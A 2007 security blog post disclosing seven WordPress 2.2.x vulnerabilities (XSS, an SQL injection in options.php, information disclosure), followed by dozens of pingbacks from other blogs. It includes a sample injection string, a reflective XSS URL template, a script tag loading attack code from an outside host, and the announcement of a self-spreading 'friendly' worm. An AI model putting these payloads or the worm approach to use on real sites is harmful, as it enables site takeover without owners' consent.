Benjamin Flesch = definitely rocks.”> Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Wordpress Blog Worm (updated) ~ mybeNi websecurity, web security and hack stuff.

web securitymybeNi websecurity

Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated)

July 31st, 2007
UPDATES AT THE BOTTOM

Much time has passed since I wrote the last Full Disclosure Publication on this Blog, it was about the security vulnerability in Akismet, a Wordpress antispam plugin.

This time you will witness something which impacts huge parts of the Blogosphere, I will tell you my story:

Yesterday, I discovered five seven new Wordpress vulnerabilities which may lead to a successful blog compromise under appropriate circumstances

1. Wordpress Persistant XSS Vulnerability in the Default Theme (v.2.2)

Affected Script: /themes.php?page=functions.php
“Header Image and Color” section of the Default Theme Kubrick.

Severity: HIGH - Attack needs no authentication.

Affected Wordpress Build: 2.2 (I know this has been submitted to full-disclosure before but I already wrote down the article and made the sample exploits so I did not want to delete these parts afterwards)

WARNING: This issue may lead to a full blog compromise if the default theme is enabled!

The vulnerability is some weeks old and because of that I don’t include it in my Wordpress PoC XSS Blog Worm - more on this topic at the end of this post.

 

2. Wordpress /options.php SQL Injection Vulnerability

Affected Scripts: All Wordpress files referencing /options.php in a form field, this includes:

  • /options-general.php
  • /options-writing.php
  • /options-reading.php
  • /options-discussion.php
  • /options-privacy.php
  • /options-permalink.php
  • /options-misc.php

Severity: LOW - Attacker needs Admininstrator Privileges or valid _wpnonce.

Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)

Wordpress options.php SQLInjectionSo what causes this Database Error shown on the Screenshot?

When one of the scripts listed above sends a post request to /options.php, the value of page_options is NOT filtered.

This allows any user having Admin Privileges to manipulate Database queries and/or Values. Of course this can be used for further exploitation as I’ll show in the next part of this advisory.

By the way, the affected SQL query is

SELECT option_value FROM wcblog_options
WHERE option_name = ‘$page_options
.

So $page_options may be used for SQL Injection, that means if it contains a value like ' AND '1'='1, the query is processed successfully AND a new key called $page_options will be created in the database table wp_options.

Some of you, my dear readers, may have noticed that now, we have the ability to create new database keys plus corresponding values. This smells of persistant XSS, and another Wordpress Feature is helping us here:

 

3. Wordpress /options.php Information Disclosure

Severity: MEDIUM - All Blog Options are listed on a single page and may be accessed for example via XSS

Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)

Why is this a security risk categorized as MEDIUM?

If /options.php is accessed by an Administrator without any given parameters, it just dumps the whole Database Table wp_options, including all Blog settings like the secret hash, the Administrator’s email addresses and other configuration stuff.

The whole script is running WITHOUT ANY OUTPUT VALIDATION - we can trust the data coming from our own Database, can we?!

And this very issue leads us directly towards another, much more critical threat:

 

4. Wordpress /options.php Persistant XSS Vulnerability

Severity: MEDIUM - Persistant XSS in the Admin Panel, nevertheless, the Attacker needs Admininstrator Privileges or valid _wpnonce.

Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)

Wordpress options.php Persistant XSS Vulnerability

Let’s assume an Attacker is able to combine Points 2) and 3) of this post by using an XSS Vulnerability. The XSS flaw may exist either the Blog Software itself (in this case “Wordpress”), a third-party plugin or other custom-made scripts on the same webserver/domain.

This would allow a complete Blog overtake, wouldn’t it? The cocept behind this combined XSS / CSRF Attack is:

  • Use an XSS flaw and Vulnerability 2) in combination to insert something like <script src=http://yourpage.com/attack.js ></script> into the Wordpress Options Database Table.
    Of course, before doing this, you need to extract the _wpnonce Wordpress Administration Panel Token by using some magic Javascript code and XMLHttpRequest - this is very basic Javascript stuff and easy to accomplish by an skilled Attacker.
  • Afterwards, you just have to send the Administrator to /options.php and the Javascript Code will be executed.

 

5. Wordpress /edit-comments.php Database Error (Bug)

Severity: NONE

Affected Wordpress Version: 2.2.1 - the latest version

In /edit-comments.php, the parameter apage is not properly sanitized before it is used to calculate the rows from which Wordpress tries to pull the comments from.

So in case apage has a negative numerical value, Wordpress throws a Database Error caused by an corrupted SQL Query which can be seen in the picture. It tries to SELECT all data from the table between rows -40 and 25, and this - of course - does not work ;)

Edit Comments Database Error

 

6. Wordpress /link-import.php XSS Vulnerability

Severity: LOW - Attacker needs Admininstrator Privileges or valid _wpnonce.

Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)

Wordpress Link Import XSS Vulnerability

 

The parameter opml_url isn’t sanitized and thereby creates an Cross-Site Scripting vulnerability.

Anyways, for a successful attack the _wpnonce Authentication Token is needed so this one is quite useless - No one would use XSS to get a Token in order to use another XSS Vulnerability on the same Domain.

As usual, I made a shiny picture of this flaw “in action” :)

 

 

 

 

 

7. Wordpress /upload.php XSS Vulnerability

Severity: HIGH - Attack needs no authentication.

Affected Wordpress Version: 2.2.1 - the latest version (This is a 0day Vulnerability)

WARNING: This issue may lead to a full blog compromise.

Wordpress upload.php XSS Vulnerability

In /upload.php the parameter style is prone to XSS Attacks when editing Temporary Uploads (they usually have a negative ID). An attack could look like this:
/upload.php?style=%22%3E{shellcode}&tab=upload&post_id=-1337

As you can see this is a very basic reflective XSS vulnerability. This shouldn’t happen within a Web Application.

 


If you have read my post up to this point I may have convinced you that XSS Blog worms affecting “real” Homepages are more than just a theory, this concept is ready to attack.

During my Research on this “Wordpress Vulnerability Assessment” - it took 2 (TWO!) days to find these flaws - I realized again that Cross-Site Scripting is the most dangerous threat out there: It is able to cause everything from a harmless Defacement or a single Blogpost up to a manipulation of the Theme’s PHP files to include a Remote shell or the enabling of the Post-via-Email Feature - a very funny Wordpress “Feature”.

Some more things XSS can do to your Blog using the upper Vulnerabilities:

  • Grab your Blog’s complete RSS Feed using Wordpress’ built-in “Export” function.
  • Add some new Blog posts with funny ads, more exploits or random jokes by including an remote Feed using Wordpress’ built-in “Import” function.
  • Add Blogroll Links
  • Add another Administrator with Password “test”
  • Delete your Blogposts (that sucks)
  • manipulate Plugins
  • change any .php file stored within the Wordpress Directories by using Wordpress’ built-in File Editor
  • just everything you as an Blog Administrator can do…

And this is why XSS flaws are the most dangerous vulnerabilities in the wild, and it is sad that so many homepage are affected. Not only your small Wordpress Blogs but also Google, Ebay, Blogspot and nearly every member of the Alexa Top 500.

XSS takes this huge leap by controlling vulnerable Web Applications’ User interfaces so gallantly cross browser and cross platform .. it just rocks! :)

Based on these Exploits I will create a Proof-of-Concept XSS Wordpress Worm which will try to fix these Vulnerabilities. :o)

– Benjamin Flesch
mybeNi websecurity

UPDATE:

I submitted the Links to the Wordpress Bugtracker:

The XSS BlogWorm patching the Vulnerabilities is launched now!




80 Responses to “Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated)”:

  1. This is the first Weblog XSS Worm ~ mybeNi websecurity Says:

    […] my small world full of websecurity, overall security, safety and… security in the web. nah, kiddin’ « previous post: Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm […]


  2. Friendly AJAX XSS Worm for Wordpress | GNUCITIZEN Says:

    […] AJAX XSS Worm for Wordpress published: July 31st, 2007 beNi has discovered several interesting vulnerabilities for Wordpress and has coded a friendly AJAX XSS worm that […]


  3. 7 nuevos problemas de seguridad en WordPress en Buayacorp - Diseño y Programación Says:

    […] algunas horas acaban de reportar 7 problemas de seguridad en […]


  4. BlogSecurity » First Weblog Worm targets WordPress Says:

    […] beNi released 7 zero-day vulnerabilities for WordPress today as well as a the first weblog worm, which topic has interested me for some time now… […]


  5. Geek Bazaar » Wordpress being drilled and plugged… Says:

    […] More here. […]


  6. Wordpress XSS Vulnerabilities Says:

    […] http://mybeni.rootzilla.de/mybeNi/2007/wordpress_zeroday_vulnerability_roundhouse_kick_and_why_i_nea… […]


  7. Blog-abfertigung: Weblog-Einsteiger aus der Frankenmetropole Nürnberg Says:

    […] gefährliche Lücken in Wordpress Der Tecchannel berichtet heute, dass der IT-Sicherheitsspezialist Benjamin Flesch sieben neue Lücken in Wordpress gefunden hat, die “hauptsächlich […]


  8. MicroZulo » Blog Archive » 7 nuevos problemas de seguridad en WordPress Says:

    […] acabo de leer en buayacorp hace algunas horas acaban de reportar 7 problemas de seguridad en […]


  9. Script Artists | Wordpress-Wurm als Security-Patch? Says:

    […] Was soll man davon halten: This is the first Weblog XSS Worm? Mehr zu den betroffenen 7 Lücken im Bloggingsystem: Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated). […]


  10. 破百的老兵 Says:

    WordPress XSS 和 worm…

    用補洞來做 XSS 的示範 ? o_O

    今天看到一篇文章,說有人找到了 7 個 WordPress 的 XSS 漏洞 (他已經跟總站報告了,不過 patch 好像還沒進去,詳情請看 #4689、#4690、#4691、#4692);而且為了 demo 這些 XS…


  11. El Primer gusano para Wordpress | La WeB de DragoN Says:

    […] de Wordpress que pueden conducir a un compromiso acertado del blog bajo circunstancias apropiadas. Todos están detallados en su blog, pero lo especial es que ha creado una prueba de concepto de un gusano que afecta el popular […]


  12. Wavecon-Mitarbeiter findet 7 Wordpresslücken » Beitrag » BlogSchicht.de Says:

    […] davon 2 als kritisch eingestuft, in der beliebten Blogsoftware Wordpress entdeckt. Auf seinem privaten Blog stellt er hierzu weitere Informationen, sowie einen Proof-Of-Concept Blogwurm vor, der mit Hilfe […]


  13. EDV - Ende der Vernunft Says:

    Sieben neue Lücken in Wordpress…

    Betroffen ist Version 2.2.1 und Abhilfe wird es wohl erst in 2.2.2 geben. Nein, ich reg mich diesmal nicht auf!
    ……


  14. WordPress: der erste XSS-Wurm » Peruns Weblog Says:

    […] TecChannel.de bekommen (hier und hier). Es ist nmlich so, dass Benjamin Flesch in WordPress 2.2.1 sieben Lcken entdeckt hat und dafr einen freundlich gesinnten Wurm geschrieben hat, der die Lcke nicht ausnutzt sondern […]


  15. links for 2007-08-01 | hansi.unblogged.de Says:

    […] Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated)… Yesterday, I discovered five seven new Wordpress vulnerabilities which may lead to a successful blog compromise under appropriate circumstances (tags: security wordpress) […]


  16. Siete vulnerabilidades en Wordpress han sido descubiertas « Alex Seo Says:

    […] vulnerabilidades de seguridad graves de Wordpress han sido descubiertas por Benjamin Flesch. El equipo de Wordpress ya las ha arreglado pero como no anuncian, lo haré yo. Tu blog se […]


  17. WordPress Worm도 나왔고나…. « 2600KR Says:

    […] 친구가 WorPress 2.2 XSS 취약점을 이용해서 웜을 만들었다고 한다. (beNi has discovered several interesting vulnerabilities for Wordpress and has coded a friendly AJAX XSS worm that […]


  18. g30rg3 Blog » Otra lluvia de bugs de WordPress Says:

    […] fáciles de entender alex concha ya lo ha hecho y pues volver a escribir lo escrito es algo tonto, también la pagina del autor lo dice muy explicito pero si solo se los recomiendo a los que sepan ingles y de paso les aconsejo que no tomen tan […]


  19. WordPress más inseguro que nunca - Carrero Bitácora de los Hermanos Carrero, David Carrero Fernández-Baillo y Jaime Carrero Fernández-Baillo. Says:

    […] descubrimiento lo ha hecho Benjamin Flesch, y aunque el equipo de Wordpress lo ha actualizado en el SVN de desarrollo no se ha hecho eco para […]


  20. alles was bewegt » WordPress: 7 neue Sicherheitslücken - Panik? Says:

    […] von der Blog-Abfertigung hat gestern auf die von IT-Sicherheitsspezialist Benjamin Flesch entdeckten Sicherheitslücken hingewiesen. Benjamin Flesch stuft zwei davon sogar “als Hoch […]


  21. mynethome.de » Blog Archiv » WP XSS Wurm doch nicht soo freundlich? Says:

    […] ist der erste Wordpress Wurm veröffentlicht wurden, der eine Cross Site Scripting (XSS) - Lücke au…. Zum Glück ist er freundlich und hilft Wordpress nutzern dabei, diese direkt zu schliessen. […]


  22. Wordpress: 7 Sicherheitslücken in 2.2.1 | wordpress | XSBlog2.0beta Says:

    […] Klasse, da werden gleich 7 neue Lücken auf einen Schlag in Wordpress 2.2.1 entdeckt. Offizielle Abhilfe gibt es noch nicht, allerdings einen “friendly worm“, der […]


  23. Personal Portfolio of Merz Manuel » Blog Archive » Wordpress security wholes - patch with the worm Says:

    […] is all you have to do if you want to patch your current wordpress installation Thanks to Benjamin for this […]


  24. WordPress-Sicherheitslücken und vielleicht eine neue Art diese zu schliessen bei im web gefunden Says:

    […] gesagt: mybeNi hat sieben Lücken in WordPress gefunden und veröffentlicht. Hauptsache man gewöhnt sich nicht langsam an diese Hiobsbotschaften […]


  25. XSS Weblog Worm « Security, Version, Cross-Site, Infos « Latha-Math.com Says:

    […] Weitere Infos hier: this is the first weblog xss worm wordpress zeroday vulnerability […]


  26. Secure Wordpress with the first Wordpress Worm Says:

    […] you know that the latest version of Wordpress contains at least seven security vulnerabilities that could compromise your blog ? If you use Wordpress you should make […]


  27. Worte statt Taten! » Wurm stopft Wordpress-Lücke(n) die er benutzt Says:

    […] mybeni genau eine dieser Lücken, um sie zu patchen. Interessanter Proof-Of-Concept-Wurm! Detailliertere Infos inklusive der Möglichkeit die Fehler zu beheben finden sich natürlich…! Share and Enjoy: These icons link to social bookmarking sites where readers can share and […]


  28. Sebastian Says:

    Your script does not check if the files are writable.
    Any chance you add that? Otherwise ppl might think they are patched while they are not ;-)


  29. Wordpress Worm that fixes Wordpress | The Sh17 Says:

    […] this guy discovered seven vulnerabilities in the latest version of Wordpress and decided to write a worm that will go into your site and […]


  30. Gusano tapa agujeros en Wordpress | TechnoBytes MX Says:

    […] último “lote de agujeros” descubierto en Wordpress incluye nada menos que siete, que no merecerían ningún comentario aquí de no ser por el ingenioso sistema que su descubridor […]


  31. WordPress Worm? « Mark on WordPress Says:

    […] I’ve been getting a lot of questions about this post by Benjamin Flesch, so here’s a quick […]


  32. BullinoBlog » Ein freundlicher Wurm für Wordpress Says:

    […] Fleisch hat in Wordpress 2.2.1 7 Sicherheitslücken (XSS-Lücken) entdeckt und diese auch […]


  33. datenschmutz.net Says:

    Wieder mal üble Sicherheitslücken in WordPress…

    Eine ganze Reiher neuer Vulnerabilities im beliebtesten Blog-Hosting System schreien nach rascher Abhilfe. Auf Wunsch kümmert sich ein ausnahmsweise freundlicher Wurm um die Schadensprävention.
    ……


  34. SigT Says:

    Siete fallos de seguridad para WordPress 2.2 y 2.0…

    La noticia no es “nueva” ya que es de hace unos días pero no la he tratado hasta ahora porque estaba ocupado revisando (dentro de mis limitaciones) código para ver cómo afectaba a la rama 2.0.x.

    Como sabeis actualmente se usan dos ramas…


  35. Problemas de seguridad en Wordpress | gEEK tHE pLANET Says:

    […] esta página encontrarán cada una de las vulnerabilidad explicadas debidamente. En esta otra pueden encontrar […]


  36. Ïðîñòî Ïóòíèê Says:

    Ïåðâûé ÷åðâü äëÿ wordpress…

    Âîò òàêàÿ ôèãíÿ ñëó÷èëàñü. Ïîäâåðæåíà âåðñèÿ 2.2, ïðåäûäóùèå âðîäå áû íåò.
    Îáíîâëåíèå ÷åðåç ÷àñ: Îäíà(?) èç äûðîê ïðèñóòñòâóåò è â 2.1.1.
    Ëå÷èì:
    w…


  37. Cross-Site-Scripting-Schwachstelle in Wordpress at blog.growing-media.de Says:

    […] Artikel auf mybeni.rootzilla.de Artikel auf heise.de […]


  38. Dimension 2k : Blog Archive : Fünf neue Lücken in Wordpress? Says:

    […] und Cross-Site-Scripting-Lücken - in Wordpress hat Benjamin Flesch in seinem Blog veröffentlicht. Vier dieser Lücken setzen allerdings einen Login als Administrator voraus, was meiner Meinung […]


  39.   Importantes fallos de seguridad en WordPress 2.2.1 por Agamum.net Says:

    […] se han descubierto 7 nuevos fallos de seguridad en WordPress 2.2.1 (aunque también afectan a la rama […]


  40. Wurm schließt Sicherheitslücken in Wordpress 2.2.1 auf Kevin-H.de - der Blog von Kevin Hausen Says:

    […] hat nicht nur sieben neue Sicherheitslücken in der aktuellsten Version (2.2.1) von Wordpress gefunden, sondern auch direkt einen […]


  41. 5 Sicherheitslücken in Wordpress 2.2.1 mit Fixes » Marnems Sicht der Dinge Says:

    […] Dienstag sind einige neue Sicherheitslücken in Wordpress 2.2.1 bekannt. Der Entdecker hat sich leider dazu hinreißen lassen, die Lücken ausführlich […]


  42. Blackhat SEO » Blog Archive » Wordpress Vulnerable to Worm Says:

    […] Flesch points out seven Wordpress XSS exploits that could be used partially or en totalis to create a 0day Wordpress worm that […]


  43. Kcroap’s lazyblog » 版面修改 Says:

    […] 把wordpress升級到2.2.1,內建Widgets support,並使用了友善的worm來修補漏洞。 […]


  44. WordPress Sicherheitsupdate 2.2.2 und 2.0.11 - dynamicinternet Says:

    […] handelt es sich um reine Sicherheits-Updates. Die meisten dieser Sicherheitslücken wurden von mybeNi aufgedeckt. Die deutsche Version soll im Laufe des Tages […]


  45. Stefan Graf - WordPress - XSS Sicherheitslücken Says:

    […] Flesch hat 7 XSS Sicherheitslücken in der WordPress Version 2.2.1 […]


  46. Neue WordPress-Versionen 2.2.2 und 2.0.11 aufgrund Sicherheitslücken — Software Guide Says:

    […] | Wordpress Vor 5 Tagen hatte Benjamin Flesch auf einige neue Sicherheitslücken in WordPress aufmerksam gemacht und daraufhin sogar einen gutartigen Wurm veröffentlicht, der die Probleme unter Ausnutzung der […]


  47. Official Wordpress Updates - 4 fucking days faster than Mozilla ~ mybeNi websecurity Says:

    […] course - like this business is - the Wordpress Developers don’t even mention that I found all these bugs in their Webapplication and even submitted them to their bugtrack which saved them a lot of […]


  48. alldev - Ein Webentwicklungs Blog Says:

    WordPress 2.2.2 und 2.0.11 Sicherheitsrelease…

    Letzte Woche wies mybeni auf verschiedene Sicherheitslücken in den aktuellen WordPress-Versionen hin, die Angriffe per XSS und SQL-Injektionen ermöglichen.
    WordPress hat nun auf diese Sicherheitslücken reagiert und zwei Sicherheitsupdat…


  49. Rilasciati Wordpress 2.2.2 e 2.0.11 Says:

    […] consiste in una vulnerabilità cross site scripting riscontrata in uploads.php e segnalata dal blog mybeNi, mentre il ramo 2.0 la vulnerabilità più seria consiste in un Sql injection blind fishing exploit […]


  50. Update Wordpress 2.2.2 at blog.growing-media.de Says:

    […] in Wordpress Artikel auf mybeni.rootzilla.de Artikel auf […]


  51. Wordpress 2.2.2 Released - Upgrade ASAP - ShoeMoney™ Says:

    […] addresses 1 of the 7 security issues found on this page last […]


  52. Wordpress Security Problems at IT Damager Says:

    […] is a blog entry about 7 Wordpress vulnerabilities that seems to have provoked today’s Wordpress […]


  53. Siete vulnerabilidades en Wordpress « Blog De Seguridad Informatica Y HijackThis Says:

    […] Agosto 5, 2007 @ 9:14 pm } · { Manuales } En 1 solo día, Benjamin Flesch ha descubierto siete vulnerabilidades en Wordpress, las cuales parece ser que ya han sido […]


  54. CS Internet Blog Says:

    WordPress Update 2.2.2…

    Vor ein paar Tagen sind einige Sicherheitlücken im Wordpress System aufgetaucht. Einer der Entdecker der Lücken hatte zur Schließung auch bereits ein kleines selbstgeschriebenes Script Wurm programmiert, welches die Größten L&#…


  55. WordPress Security: Critical 0-Day Upgrade Released Today for 2.2 and 2.0. | Blog Strokes Says:

    […] has posted 7 zero-day cross site scripting vulnerabilities that todays upgrade fixes. These can be some nasty stuff and could cost you your whole blog if you […]


  56. Unatine :: blog : links for 2007-08-05 Says:

    […] Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated) […]


  57. WordPress Security - Time to Upgrade Again Says:

    […] motivation, here’s what can happen to you if you don’t upgrade…courtesy of mybeNi, who originally found the […]


  58. Pendejo Says:

    too bad most of the hacks here totally screw up the blog….


  59. Webmomente.de » WordPress 2.2.1 und 2.0.11 Sicherheitslücken geschlossen Says:

    […] Benjamin Flesch vor einigen Tagen herausgefunden hat, gibt es in der Version 2.2.1 sieben kleine bis schwere Sicherheitslücken, die auch umgehend nach 6 Tagen vom WordPress Entwickler Team behoben worden […]


  60. GroundFloorSEO.com | Top SEO Blogs & Bloggers » Wordpress 2.2.2 Released - Upgrade ASAP Says:

    […] addresses 1 of the 7 security issues found on this page last […]


  61. » WordPress Upgrade Says:

    […] upgrade your install. There has been several security fixes in the new update that address these security exploits here. The upgrade was smooth, all I did was deactivate all my plugins, uploaded the new files […]


  62. Yahoo! Blogs are open to Attacks and Hackers ~ mybeNi websecurity Says:

    […] That’s what I imagine a Yahoo Sysadmin saying all day. If you really need to use Wordpress, make sure you check for updates periodically - the past showed that this Software bears a lot of flaws! […]


  63. Exploit Says:

    Xss Wordpress Worm promette ma……

    Alcuni giorni fa mybeni ha individuato ben sette vulnerabilità nella piattaforma di blogging Wordpress e confermate dalla stessa organizzazione. Sulla scia di questa Full Disclosure lo stesso ricercatore ha realizzato un worm XSS benigno che aiu…


  64. Chris Says:

    How do you figure attacks which require admin access are of high severity? Being admin makes doing far fetched SQL injection attacks and reflective XSS kind of pointless, doesn’t it?

    That’s like saying there’s a local privilege escalation vulnerability on windows that requires you to be local admin.


  65. beNi Says:

    Hello Christ1an, the problem is that by using the Admin’s authentication tokens you’d be able to add for example another administator or stuff.. just by using wordpress’ functions.


  66. My Stuff | Secure Wordpress with the first Wordpress Worm Says:

    […] latest version of Wordpress contains at least seven security vulnerabilities that could compromise your blog. If you use Wordpress you should make sure […]


  67. Using a Friendly Worm to Patch WordPress 2.2.1 Vulnerabilities at Gadgets and Gizmos World Says:

    […] Source […]


  68. XOOPS-Buch.de - XOOPS kompakt Weblog » XOOPS-WordPress 2.2.2 mit deutschem Backend Says:

    […] in der Version 2.2.2 zum Download bereit. Wenn Sie noch 2.2.1 verwenden, sollten Sie aufgrund der Sicherheitslücken unbedingt auf die neue Version […]


  69. Liens d’août 2007 .:::::. SkyMinds.Net Says:

    […] Wordpress ZeroDay Vulnerability Roundhouse Kick and why mybeNi nearly wrote the first Blog Worm. […]


  70. WordPress Vulnerabilities | milo Says:

    […] Read complete article at Rootzilla. […]


  71. Un gusano de los buenos nos parchea Wordpress Says:

    […] Si bien nunca sabremos en realidad lo que puede llegar a estar haciendo el gusano. Según dice su autor lo que hace es parchear WordPress para que no te pueda pasar nada malo, al fin y al cabo si el se […]


  72. WordPress Wednesday News: WordPress 2007, Nominated for TechCrunch Crunchies, More WordPress Blogs Hacked, WordPress Events in 2008, WordPress.com Blogger Wins, and Snow : The Blog Herald Says:

    […] Wordpress ZeroDay Vulnerability Roundhouse Kick, a remarkable article on WordPress security vulnerabilities, has been updated to include vulnerabilities in Akismet as well. […]


  73. WPDesigner » WordPress Tips Part 1 Says:

    […] Further info here. […]


  74. D.C Life Says:

    WordPress2.2.1的新漏洞…

    31日有人发布了七个相关的漏洞,原始页面:Wordpress ZeroDay Vulnerability Roundhouse Kick and why I nearly wrote the first Blog Worm (updated) ~ mybeNi websecurity。已经被w…


  75.   Dicas para Wordpress - Parte I by Cadu de Castro Alves Says:

    […] a explicação completa aqui. (em […]


  76. WordPress 小技巧(转) Says:

    […] Tips #3 不要使用默认的 Kubrick 主题(V2.2),因为它包含了一个安全漏洞:Header Image and Color 中的 /themes.php?page=functions.php。更多信息。 […]


  77. Security Wordpress plugins that make your site secure ! | Flex & AIR Says:

    […] Further info here. […]


  78. 11步打造安全高效的 WordPress 站点 | ₪₪ BlueFox Blog’s ₪₪ Says:

    […] 更多请看 here.。 […]


  79. Astowsswoftop Says:

    oh yeah, one more thing I can be ticklish about my ugly museum Sorry, for off top, i wanna tell one joke) What do you call bedtime stories for boats? Ferry tales.


  80. gry dla dziewczyn Says:

    great job! thx :)


Leave a Reply


Google Traffic (7 days)

550
500
450
400
350
300
250
200
150
100
50
473
476
460
510
536
515
449
38.107.191.86